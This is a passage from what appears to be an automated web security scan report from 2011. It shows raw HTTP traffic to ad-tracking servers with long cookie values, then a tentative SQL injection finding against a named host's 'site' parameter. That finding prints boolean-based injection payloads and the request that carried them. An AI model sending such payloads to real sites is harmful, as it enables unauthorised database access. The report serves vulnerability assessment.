Set-Cookie: pf=zNY_iQmPYa_zclA7g1v0xJycYSF0qEoRj_yAFOA4SG5pZRM3I2Ow27XFAiLSy6gtZDpM35cC-2bkiEEmtUQheN5B5Bu9BqMBtjj7wP__NClHw7bLxoA5_jGg94DVp3tlq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdcMaLOL4cJUfMXqa69SSN-06j536gTCcrB8YkBaxDNOYv0spABEy5U_6uYzsaV0qHQy9M-nlqe5xLK0APWVwpFX-_R4ZkxZQ92TvfhRJZWCKsQ-tcOZ2wgA7MRrLH9BDXSkGVYGnSrzAmAhYFK42FCqJ_bp4SQNvkxFNi9IqhDA1c4FCwip4hawpujD7cxMW91JQLloe71uUN_fZGNhLxDRcxm6HVkCDO3jWerY1EJJckUwRn11mDb8lLoWDWOsi7xA5skONMrsqXGo9p_vQs-t8YtMxk53J1X-JEGSNIkxwfWnknNBbhXoz-w093w6uPnrCrV8PM9h2q-bSke-3jj0Ox2DYFU6iqxk5L-aQl1-5uTvAOxSB4mxo-Q6YMhB3VRGEabSKFXWzzMFpGtePKWG6DI-3yIiz3klMj1NWsklmmJwxaXYX8FFp7QAiI8nhwY1wWZ88KpsxHeP2XzXjFK_d-kGppF9S1RgFdt4GxBL--0Hm7pxAE9wMk_nQukZkyBKQSQ1lCnTGDkELZF5yaD5hov27V-adyHqGdS8YvpzfU9SPbCBiT580Iy8irYv9iLBuqwH5rpaIoYyVJTY1OsHZhoKS-Wug910AyWOuinjbr_0z5zf699wFMrWmMcclxzKaAaCNEmLp68Zqq2-LWceDpHaHyI0WpGDwhgIzAtbsX2XsnLt_LbqkSFnImQEfYXMgXlc0VMb90O2rAmT1rycecRmU6rUbNsVDYkn5QLEhbFvkLTc7EK3c3cK3KAt7ZIWB0eYrt6rJ0EoQmsnjCl24yTT_skx4PxMC_6f5JWuwDBmE7vZLIZ9H7tPC0iivWeeN1mguVa38qqmJaz4uUbEOjFEcGULe2ZUh9flwtxT5cGt8FXbRwX1lPbREIX5I_D2yDEgqdLPaeOqMB3phwSOODNlE2lYGr6y0_5J6Hwt_33Lph88Xs-KFXy5W4ivRl_vERszhIysFDRbRBMN3GpvQXHBGqyKUPQThxpOTF1mBnvVPMo6zKgQkjOLsgQfETK5o1Cbsw0Gt8itAK0AFg_BStc7g19L1MTTYv7Hn3oU47PhJPD-mcEisqb13qOvvht_-DVFreVT3zwVb5sJMvIhgejHovgqOT4uj1NncwfIJ0b-RQ3NwrbcUpT2qMXfWSYPxsQgJzG8QzzBt2lV0ge-NeNGb7yjFoK7QuEglqvP9t_vj8eiDnuN0jxaGTEGN4XvI4UrkhsaVUzG7tgYqtXFe8gCjp1FSMzciKpjqLF8rRjHKKyMf3iBzsNJjRLBICfc701uFK16Z8GTUfnagGPaQBmalZ8DIFLMY_ydFO68F9tdI0k-RTl2po5thPnqgz676hey8Q2Glpyu8gs4ySxBbBf9YF0LqeFNmeoiGiHHjGx8yXVuM2hVoYu9RFDnkolfklaPDEFPrf7yuoGjMotqgQPH2igEPEnLjoTMRIBBCPsgjxFuig1iQVVamfEXRPhkIqxbdXxDjRac6Jn1NtVypQBb--Nl12SEYRTSy-QWGl2-87tUUsKuOK8UUbzsrGrf4xc8703QPmY5Dc-7AceWI2QVtBIXRFf08GSMQ1Fu9K93u6Sdfk0fhdbCOiP_aIBBNYnh10h0_GCfVfV7jzJ7OCFCMhy9sZnxEnVsVLETqvFHIcoEqvx3b9PCYMBFot5aXFqJP3F9gm-dE95yUro_-iGBdYbB2xNnDHxyNpokqhxj2kjyUz5gRLkFy__Jjupt8XMNFK_DaHC8hmek7OwZdyIaOQc0I03dJ5hiw9OKqF9-hehgRs004u63INB7FFs-jw20xu54KxqkEY5K8kuTfBmnnmeXqBpFquNfU-r9a2kMiraETMoCsAiiEBbFGv5AEhYoGcQQd6_zkCcjdkXZtRmQ0WYVs8ua9c5OzhGc0IaKVSTGNqGUOXU6B47mx_6WRty3OVB6IGrE_SdvvDYQ0mHy7wHT5CMKPLaFbXGxIwM0yvOhpHHPMeQNoL_8tmA93plKQFnesG7C9l90QrSAfqu2QuVGxD4G1A88MfbLVaEDY-iI4NqLNfUeCf9PUIpxQXcXWeLifFseolSx77MXyFHnoq61yK4lL6wW3kXrpnZ_g0AAeIdqZR3FtK7_PE; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:18 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1210787&t=2
Content-Length: 0
Date: Thu, 16 Jun 2011 12:18:17 GMT

Request 2

GET /r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=undefined;ord=5328984577208.758?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=QM70Whve3yMvxkhKlZSDFc8jBjr9GZaXPVHd3KPTbrVh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCacAfwlpOGZwMiTYKzkLyV6yLZO8TKZa-nLTQQ4a65pbCg5Ip47iYWcr2TLdwTDr0L4oBBpiyP3J8NU50OkfeFof5nfT0WqmMXNTAO47jNWqP9DMJbnJ4jgxRBVKYcWOOoBo1vu2lsqV8DN9Vps5BPlmPLL60Ne9Ei9t17XStRc4rGERgBg46FC_PZzOaKvw_-cZloB2cEevUSjzsvfqJ8qZhgZ9g0kmeR-0KBwkm_b3-nHDVWO4oEVu9LZTNJAoERvvIJejvF6b257maU3ML6OZFn0pS1M8s2KPrvUfPPF0_ewHYGlNdqDaG9FYWPprE_WjI_lsRoaOz7-O-vgmKJiTz-KIh4eZr0ecbMlDpVZu91zdW0hE-4eLwR7bomsP7JSdqWSoz4sC-t192PZJ_v5Q-P1VlQMzPKKE64Al6GE9_qQBVWHaPX-roIWbRumWL1-XpDwD22ZRNSBnUmAd0wjxC8t8bNFJSd1YiPEk8t_65cnD2Yeg02hxYDcV4Js2beeQ5R5-3xXfzzH2krAPRf428tdb3ea_CHM6GXs7htoYXSpzxUEP4Lawlcjwmuu0sgABXItk3mefJp5QRHv4O0nQLT7vqCmjKMUnpRJ6SJsSELsnefots81rrNB8RkZzwt9xgKqCmjZaalMlFzn1gedMiR83opqf2DdmsWkwVThPxhyYcbbPOXHwjOkupykmG8XHU2Z_bwsvqeY5PpknKks9Ka5pRG06H0tQ1iybpB3pDqsDA387b4GyTrdtR0OxRq1W2-clEv_ue7qpjwh19AlSzwxLx1pBhUX4CYwoSQucKtJqb949HbLP0at-l-Te-c7NLS367-cid5bH8-bJWmY8nC9B9w1ij88w7eqsM7UhZeuq4rrlofmxpvpW8sH43ef-7J7zFZpaqjQcGC_vq5exjB6sqt4Mo-GvkAj2qErRL9pWBI8bQOJli1okJuMhLcQljneDOkY9olIfd-ve5Qn4-P1VlQMzPKKE64Al6GE9_6W9aRH84b2cB20BvmgB1t-XpDwD22ZRNSBnUmAd0wjyOWY3k4-itBWJe_k62xWOCrFV4LhRdbHCAEu2Xc3dVj-Q5R5-3xXfzzH2krAPRf418WpxTiSnvzOJ-ZkQfvNQASpzxUEP4Lawlcjwmuu0sgAGs1MSewshLM0Q6GhK5Ns8fU1J7JmYpzzzNP9hB_wUy05oRsNhTbhcD1_xCDQojfMSuZLsISBijKSjMDSgLlyDjsNAVa5Ct7DxoA1avkLsQ815KVjL9JqXyOpgagVKRMbntt6vzlmgFJ9k1Zzq45WeFCQUiSJFaYOp4MQlbe-RFUEK9KsJrC9CLkGJUacP7jEa1wTMgEYoXiZA8_W3FI42qThwrh-6wCu7vlgqZNOXixmWgHZwR69RKPOy9-onypkTIcQzOQc65c9KVO3IQPv8Yd11jfaAGeomVXk2jyqz756mNhe7mBUb-nxi7SHg4OCY4fQNDPmLA1QCvKDvVxcR7AdgaU12oNob0VhY-msT9lb_ydeK6sfV-VwC1t6PXZrSU8zXCbuEO-Hn-xUU7T4MdZMXr1rBrtZHchRIeH_p0MQswiaZbyLrfvl0j4wXxTj4_VWVAzM8ooTrgCXoYT3_ukoy-I69c7SrUTlHbB6rZ5ekPAPbZlE1IGdSYB3TCPPtQxe5L3Tuc-yk0WOEmJZ9iOsnV5UjcUOjnXUSJzJan5DlHn7fFd_PMfaSsA9F_jfnYBNZ11ca-Wgmkknbh9eNKnPFQQ_gtrCVyPCa67SyA_xeh6xaAKc9mefeGrL2bordkSY3wrTx66nlJUXJL2YzTmhGw2FNuFwPX_EINCiN8l08PBB5hX0JN8MvjDOsPSeOw0BVrkK3sPGgDVq-QuxAsFTUl8EdeBakl_JEHsyGF2Jfo-RxTjyjBkOV794zNZ0kTA-aymPAds4qYFrApgUvcPT0oUz-YZYVaDcHqgl-9xmWgHZwR69RKPOy9-onypimfvYrBKXvtznWuT43S50y-3u16r0dKm_zz3ndHe3WlG-QgtH60dqlqdrI16uF-EVNzoshUKoWhiHnNcI8oP4V7AdgaU12oNob0VhY-msT9kNb2AdwFV5i2vxwzlIKJ3BfY904hG-_CHlEd9j-vzfzk5Jifrc9V1OOzEX32QifKI3TThUmivC2QQLLhMmAROj4_VWVAzM8ooTrgCXoYT3-ZdIfAS6iVxgYyOedo9Ki95ekPAPbZlE1IGdSYB3TCPEX3xTtUTn7ghX1OdIngM2q-RWnunI4BlM040X2RcB965DlHn7fFd_PMfaSsA9F_jUBCGuQvL_fhodmVMnOIMvBKnPFQQ_gtrCVyPCa67SyAw4hmx2eXEqzbsKwy_MNlFfUa0Y_5ftklciMdgbQhb_wbdYORBXyNJvBU7ewnBysYP_zg1-oPoaJCGGP6Vt55Gz_84NfqD6GiQhhj-lbeeRs__ODX6g-hokIYY_pW3nkbP_zg1-oPoaJCGGP6Vt55G1OKf083dm4Ocqz5E2RJpVu9TfQkOcNz7DOIIZP_23WvvU30JDnDc-wziCGT_9t1r71N9CQ5w3PsM4ghk__bda_nUnHYqNkC6RPs4-2B8pJoMqCuwkKr26TEWeaS686ExCPxJGFKBs6DSrH4oyWVjhIBdxGEbgsgCDz8r26d8pRZAXcRhG4LIAg8_K9unfKUWejxkXIMl02q9l3ycv51k_QH1ePXpCkOqUdD3FJ26E0LEgnOhSnZw4WOirtIvKWwJRIJzoUp2cOFjoq7SLylsCUSCc6FKdnDhY6Ku0i8pbAlEgnOhSnZw4WOirtIvKWwJTJGg5u5RuPReUxP5byb5LGsjsJdNDz0zBLNR8ReLDcirI7CXTQ89MwSzUfEXiw3Iv5E8JDY11x5xog0GskBswr-RPCQ2NdcecaINBrJAbMK_kTwkNjXXHnGiDQayQGzCjVgVkoy7DysIPcuC3AUG0sb1BDdWaxOURi_bqX1S5T5G9QQ3VmsTlEYv26l9UuU-W___E3ohWz6drp_rI2j18pjDJAj7Gbh3rF9uN2-5_zdRHqYmtLfdK6unD4Xv15XLH0evbFMdkuI2WqEUI01UYXDJU38vLMvNPfD69rioBNl6-78JM-YwVK9vMhQzP5aE-vu_CTPmMFSvbzIUMz-WhPr7vwkz5jBUr28yFDM_loT6-78JM-YwVK9vMhQzP5aE-UaEwuQGXrKf1B0pg93pQC8wfsfoRTDgpAqCg9KVA9UvMH7H6EUw4KQKgoPSlQPVLzB-x-hFMOCkCoKD0pUD1S8wfsfoRTDgpAqCg9KVA9U-Nxmcu6N80G4H7yE1a6GL_jcZnLujfNBuB-8hNWuhi8zo63SsMKXllQ8R3TROrVZwRV4qFgI_yJZybaj30x3rZThUGsgezmPZdo0hiRJAEU2UlTEERLOiMahUz0Je5vrQpUNsf8ubz28dE3HpFhXM4HLQRF00hhIXSJp9kwMyEKBy0ERdNIYSF0iafZMDMhCgctBEXTSGEhdImn2TAzIQou93XF3r4cgLiZIl0wssIM; fc=c8voyByxtfmxf-PR5HgfpjgORIc3Od-xFb-8M8t9VWkz6wrQqI-cCCIP4q7JSoro0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnLP_4lD6MCBjT4SRxTIxlhNKLFBAG3Fk9H3_mDAMZFkDVnBVtdUIoJ-JIgllkJFaAJbHZLznezJA10wgg7oc-ufuxx6wPWxSLH-VTpbekwI2; pf=bskS8Lli70BjXEzd5NYfF8V9tHnIhHPKzn-ZptMbz3NTv4g2_4PHk6pD33NmTL25iyDxX-e5nvqK08ftGFlNZcB-blYU8Y2b3uGZySbN9k4boogWXDFyI4_-RvN_buohq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdbR_ukiIJxkBku1CxquV17mPFnSRDfouZL6wYhXooxR9ULrxpvguFI2ofDAIOd3EuO9yXy3nBEXqSScPA5E39O2_zg7l3tDIiyF94B5aERskWHv8BOnUkNaZrdPIQNGZqdwsP9I0MRtXw8xQWWbNPUyQsdjE_Scn2QYUNUmcT7rDH85LuW-sDtP4uwhJo9atGrEPrXDmdsIAOzEayx_QQ10pBlWBp0q8wJgIWBSuNhQqif26eEkDb5MRTYvSKoQwNXOBQsIqeIWsKbow-3MTFvdSUC5aHu9blDf32RjYS8Q0XMZuh1ZAgzt41nq2NRCSX590hwfiGo-qcVT2kvWmzeR7b1paN0zLvFemp5AQnABOzIFk-pYt5rgVKJ87aXtgPb-mafaJ5_5dz5FYF2gdO3-RhTnUyFltTQjNRcqU7m_5Dsdg2BVOoqsZOS_mkJdfuPEzm6ziEo1_QjXTUZsQGb3aBmo_VB_3afAvA7HmJ70VD1x9GqiaHujprGHOBA7aEDie69XnZ9g3UdQ8qboT72h45foF_fR8Dfspr5EIo6mININ0MwGURZOI6NOy-sr20mDmWfrauITMqFQqh085LSKQUL7YGM0pJp1-FIztq58QhVWy6LSDOwot2ckvPUzkd-FnxN8NhVB8sqANsWORR78w7iqAGDudyRR4sGrjr4yCu4BPZ9sxxEAJuqkU9WhgK5HyS-jWx86QRjwbOSlxW_AShejO2Api9OqW7wGthrtivajOoHMt7EKDIqFqYM0LalgBhHGk98NLPXedpy1UU1G0p61bv1d1Qe8RvD9O3tReDwxPBbZMzCCP1zNubGNg83l1aV51TfDhTgj1yUZOWuS-pj8W99_7k59ODgmGDUx1RLP4RQV5YsF7eRC_oBFtd7vTs-bMZZ3cr36hzZbdHwcgMjIQ67GgiGFnif7dZxa3qqTs_pw5jFRYMsjf2CDWROI6mFHsv9rileAh5u94Tal8X9jZGPmZVvtACyANcU61_2D_gjytCfJX5eIYzCUnD9N0uTPecPGlXnt0zeFF6nGhy-4kHkvuGu7mFLrHknQIOqyVa7C5Vcz2ztFo648TLIYncavW2EU0-FxAowg7Q_J3_JUWPrldWd5VL7X-3ELxQm3QGLlDe9QHA7dTmmKmFxV0767zf8vh0-XU0u6MJx4viNkNYwNHgm3A-Zsn_tb2nFJRjBcEMxdDM5u496FsXzZoCQNrRn4Nka-1SbHAlq1j0766BFlUYsZHI9nvDUSjNUKoFWTkAUa-o1j-LL1ebdsaBpOZQwog1WHvup_q5MU0eWf_8Tnz19zggAp1l0o0E-qtSYNUJ36V_bsysgOo8ovHlz0rw4urFgweCpjhoovSxZ6xAsLQbFPBlhboS688EaXiGds-5scOf0AWtR0WtyJH-06RSCV4rzVRndoxKQ6xvTNWKSQfuYds5-6wqXTrrprCUxSH31llwL8axfVJ0d6h2Ke1Lez9-eYMqCkG4uUOXcVRZwxg85KAU3HRwHZ-EWY6qIaKdc8DaRYJXxJzEtphWqdWwTUQc6r3kmRMNC1ofRqXiWAg7U15-Vq8fXUTyQ-Foh2RKGC89bCSZhuIo0DelrjnD_y1FdMAK6632Po5svz9Xs-GXO_PYmIh52EUXzRY-jfWrhp-btGaCKGToFYaTe9bd1jKXwduyoimxxjrfcWCeJq1txaaBU_3Uczg1vUpNInXslg4NWbOv3i1AMVsxWmxcjn77s3i60QHhTEr6gILrU4PmsHL3FqzwzpkTuJbzWi_g5eyZHwtMfpYoYwULodolIu7euVx1T6-kom1lfGeK534YvRLg1f6xfa7TbJat7GFUh5YcwiKTv6i2BObi71nwu2712ua_zaapTMdVqI2HeT5VUjRYlLwTM6Q4btGEdG0d_jWUX-DJJ6s4pWL_6FerjeM6JRh-LuLiaWTXIluKkF9otMRxuQA1xZO-l_PyGdq8ZIdQBo46D090aTaKlV1enoq-_ZVUdLnFjEj8JuvB_NmaEIhlkkUtL2E3UODDMR1tOQu8PjS8RbchSrxsTjxxMOUEsUJ_Z756RnNmhOA_TD07hZfxuz8bhfLCVULYz6Ok1J2_QA_kXIY92iqRVh1b6IbTDyOALqZNl5K11KDpAXL1nqDbSN94B3fAGfWH1075KVzt7-y7v8wzj5HvH-kwIHXGh1rq2Sy1u7pxUuundR497HrST_MMHxNG2Kdut19FcHWUqjUfID5JAiaS2fFEZWuWIqjpSvJM2ivPIAO7c_zUdwbkiWS8ejzieFqJCa8rSsS_dWSQq-Icz8Io9aHLgwbQxkFBxTOEAWmKRZWPfJkX_p8vFnb1Nu9kYvRadgXAM7qphVq6O0Tj; uid=4325897289836481830; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18%00''; rds=15138%7C15138%7C15138%7C15141%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:19 GMT; Path=/
Set-Cookie: pf=QkXlLsXeCof1FxNQlI490eQPsAJdXZ7IIbiMDv2SRfISHVK1_OEyMmAGdBklK9v3ZDpM35cC-2bkiEEmtUQheAr1JHtLNIcOUiq7qjRhLlMTVtX1JClFcyiqN-UpZ4B0q-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdjvdQWoWzqMK0drdqRnQSu6m5tCSgQ9okTgBLIfp7onLJE-aClvF86XEG4y2j7Z9gl2gRWhWGYpvLAxA12w9cxiIBMhK7XJNw8X8COJW_RkR5xzwvpeRqXCzd5zwVq62EgBkS8lgn_0fR46CiaxQScz8BZJ8Rv4Ff_c_3rVtIIN1i8UiQErusP9NO6AxTgL1R9GXJNBLuxCil8OstE6UbErLgYgxKhpXLkzUs0B5wU7rwVFIBOqPN9C41MRxI4I-PwInFmX86VXogn3Ug5S4btYU88gy6fFTI6k9Lc8oTkR9RS7ahaBzeY1ExInPPa3blfamT46xg16p8euZB7eQVYAYzkTdgBz17_7yGtSkNiNXMKv0kCNhz14WyHRtxKPKNUmeBsP0aUt5oVR5-YC2c6uVqXA-UUQOby0yN7jLB8i9RCiSB7bxZBuw62UiWlH6qTlxKtZwu9mxvrwly1rFPraqBXpiSWkWNdhqOFdseOHzBTROtWl0b2NPVbRqMwYE7vgyZkcPju4h8dXOW1YRC2EkY5ktqOpws9vn-tQw4C9Pgk-8b4vO-EtKQS29EqGyEiqFrgLQbs_KMqw9Ai-wuJeb7tZjoq9Xjfe3S_MQGeuaOxOHVqZ8CtpOZEmf9cbQcXEI1IP3ZiGEPDKW14z9lqNo1zaL7mkGUUbcQzcLotTkzELHTm4CrVNO4IAE_bQoQrda6uWlMmwtlOmB1DPe7MSsesve6vuBgJLL6nasaSg93C1yz0D1afpPwNJe8kc4d6aqIyN7aM5G7iGJ5cooWxIImd9eLNEhcTp44Fl4MpWiQRgQcEsfe_QTcoVdsmoM46IOvwY43JxSSaogx2WI4Y4D0gqZRjgSblBAjI68x3cxQNGLeMpAZnlJZ-L3SmNbMjjmVHmkk_-kBlcty4HjY0H8u2t1hYZ87GZZjAmAFUlPIYU1tRmSXIcPfF4hLwBMnow5jP1zELEB-J2bHbTxZs1kRBAdDG2iEqya0fjCizViwf-BtUiBJARqMsv8pcBsagQiB-_G71hkEaDNGB691oA7n83t3xebtv1vUtV_fo27xBQgJwN0WaX0mAgtftdzasdfADbPQNbNcAmotsl3_lC2-CuVZ-X3zQqoA0L5GtrYiJscC5D1RWZ-iLd5VKH_H9V0z_3argECBQ297KevASH91dt11YTrSl4jAu3uAHR6nR7n6Rwh9KKtB4kiNg2voFVVORwg9ZptXnoETA-nrIkjKXGdCoMkpFadMDbhgpnb3ORwAzqg0PMCO0pghekwgFPR3-U6O-iJqIUmx-ooGGwVlHB6kV0IwZiDGfrUYrbIxvdYLbjC1jLLmfgWCrh3gqGuW2wITqqg7s5AGH77norxafsfNsoi-DwCrG0K3NTHuXAEAA1Ktng_3xPtcUTuSsdEtY7ZYFcBZQ1y0ATyghVuv1cV2KYeJr1SeyM5ad7NmqRByD7y2n1mCnxxKsb6sl5tNicgYNpqsIQwFe_U9bui7Dnq02l9N_Z6ViZKOStEBirr4CXMtiDW4w_7vxGu6c5qcSmjNKRjbC_dGLUSdMdlhb5rkWmgnWmzhuRo0HuNYR_YY3DEEM_i2LorcaiS_xOEQbfF9mepjhhg-xn7UisdgkcOoh4w6twOxuVwhuhnkK5TWoOhRHy1HahEz4hD9wLj0XDnJrRPsXnPzDtO5YIbO_0H81Av_WEOXlw64dEJToedCjM_rJANTA7mEJzrlb0o8QEr2QX7q5s9ON8--wpoqZq8b18bKoFV6hCVVjUAvcRCz0U9ob0r6FT3E9YlM4BnIUh7fNXzlGrmulWgzBQtu1DAQgPxgss4TuKAMASVtRlrHly51JHNPp0y2NJa0BEaiAuNZITLmSKFF3F9WLiFQcukpu7C7xWzK2jiRfNiORt5kNklylYixSq3CxlJ_gsmqmV5Rcfx0bJXukxAJj28jwWsqqfo1eCQbvjAUdRPl2z9iU_1tUwpXsHYGz-QeAAgsQUjlwrgOoYfmTrtuwVfmAPUqu3TpVjSd22qkYznqS7vknwhCjycawFpJqNxCaSa-USwNSLxdAY8rCpibKJTw3EBpcO1UY56GbWKx3Zg; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:19 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1210787&t=2
Content-Length: 0
Date: Thu, 16 Jun 2011 12:18:18 GMT


1.14. http://script.footprintlive.com/ [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://script.footprintlive.com
Path:   /

Issue detail

The site parameter appears to be vulnerable to SQL injection attacks. The payloads 18703088'%20or%201%3d1--%20 and 18703088'%20or%201%3d2--%20 were each submitted in the site parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?site=nicusa.com18703088'%20or%201%3d1--%20 HTTP/1.1
Host: script.footprintlive.com
Proxy-Connection: keep-alive
Referer: http://www.egov.com/Pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/javascript;charset=UTF-8
Date: Thu, 16 Jun 2011 11:16:09 GMT
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 3683
Connection: keep-alive

ot_d=document;ot_un="undefined";
if(typeof otgoal!==ot_un){ot_goal=escape(otgoal);if(ot_goal.indexOf('%u')!=-1)ot_goal=escape(ot_goal);ot_goal='&otgoal='+ot_goal;}else ot_goal='';
if(typeof otclv!==ot_un)ot_clv='&otclv='+otclv;else ot_clv='';
